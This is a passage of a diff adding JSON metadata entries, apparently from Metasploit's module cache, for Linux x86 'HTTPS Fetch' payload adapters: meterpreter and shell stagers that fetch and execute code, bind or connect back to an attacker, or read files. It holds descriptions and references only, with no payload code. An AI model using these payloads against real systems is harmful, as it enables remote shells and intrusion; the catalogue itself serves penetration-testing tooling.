connection (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_ipv6_tcp" + }, + "payload_cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid": { + "name": "HTTPS Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" + }, + "payload_cmd/linux/https/x86/meterpreter/bind_nonx_tcp": { + "name": "HTTPS Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/bind_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_nonx_tcp" + }, + "payload_cmd/linux/https/x86/meterpreter/bind_tcp": { + "name": "HTTPS Fetch, Bind TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_tcp" + }, + "payload_cmd/linux/https/x86/meterpreter/bind_tcp_uuid": { + "name": "HTTPS Fetch, Bind TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_tcp_uuid" + }, + "payload_cmd/linux/https/x86/meterpreter/find_tag": { + "name": "HTTPS Fetch, Find Tag Stager", + "fullname": "payload/cmd/linux/https/x86/meterpreter/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nUse an established connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/find_tag", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/find_tag" + }, + "payload_cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp": { + "name": "HTTPS Fetch, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to attacker over IPv6", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_ipv6_tcp" + }, + "payload_cmd/linux/https/x86/meterpreter/reverse_nonx_tcp": { + "name": "HTTPS Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/x86/meterpreter/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_nonx_tcp" + }, + "payload_cmd/linux/https/x86/meterpreter/reverse_tcp": { + "name": "HTTPS Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/x86/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "tkmru" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_tcp" + }, + "payload_cmd/linux/https/x86/meterpreter/reverse_tcp_uuid": { + "name": "HTTPS Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/x86/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_tcp_uuid" + }, + "payload_cmd/linux/https/x86/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/x86/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/x86/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/x86/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/https/x86/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/x86/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/x86/metsvc_bind_tcp": { + "name": "HTTPS Fetch, Linux Meterpreter Service, Bind TCP", + "fullname": "payload/cmd/linux/https/x86/metsvc_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hdm " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nStub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/metsvc_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/metsvc_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/x86/metsvc_reverse_tcp": { + "name": "HTTPS Fetch, Linux Meterpreter Service, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/x86/metsvc_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hdm " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nStub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/metsvc_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/metsvc_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/x86/read_file": { + "name": "HTTPS Fetch, Linux Read File", + "fullname": "payload/cmd/linux/https/x86/read_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hal" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nRead up to 4096 bytes from the local file system and write it back out to the specified file descriptor", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/read_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/read_file", + "staged": false + }, + "payload_cmd/linux/https/x86/shell/bind_ipv6_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/https/x86/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn ", + "egypt " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_ipv6_tcp" + }, + "payload_cmd/linux/https/x86/shell/bind_ipv6_tcp_uuid": { + "name": "HTTPS Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/https/x86/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" + }, + "payload_cmd/linux/https/x86/shell/bind_nonx_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/https/x86/shell/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/bind_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_nonx_tcp" + }, + "payload_cmd/linux/https/x86/shell/bind_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/https/x86/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for a connection (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_tcp" + }, + "payload_cmd/linux/https/x86/shell/bind_tcp_uuid": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/https/x86/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_tcp_uuid" + }, + "payload_cmd/linux/https/x86/shell/find_tag": { + "name": "HTTPS Fetch, Linux Command Shell, Find Tag Stager", + "fullname": "payload/cmd/linux/https/x86/shell/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nUse an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/find_tag", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/find_tag" + }, + "payload_cmd/linux/https/x86/shell/reverse_ipv6_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/linux/https/x86/shell/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to attacker over IPv6", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_ipv6_tcp" + }, + "payload_cmd/linux/https/x86/shell/reverse_nonx_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/x86/shell/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/reverse_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_nonx_tcp" + }, + "payload_cmd/linux/https/x86/shell/reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/x86/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "tkmru" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_tcp" + }, + "payload_cmd/linux/https/x86/shell/reverse_tcp_uuid": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/x86/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_tcp_uuid" + }, + "payload_cmd/linux/https/x86/shell_bind_ipv6_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/https/x86/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "kris katterjohn " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection over IPv6 and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell_bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell_bind_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/https/x86/shell_bind_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/https/x86/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an x86 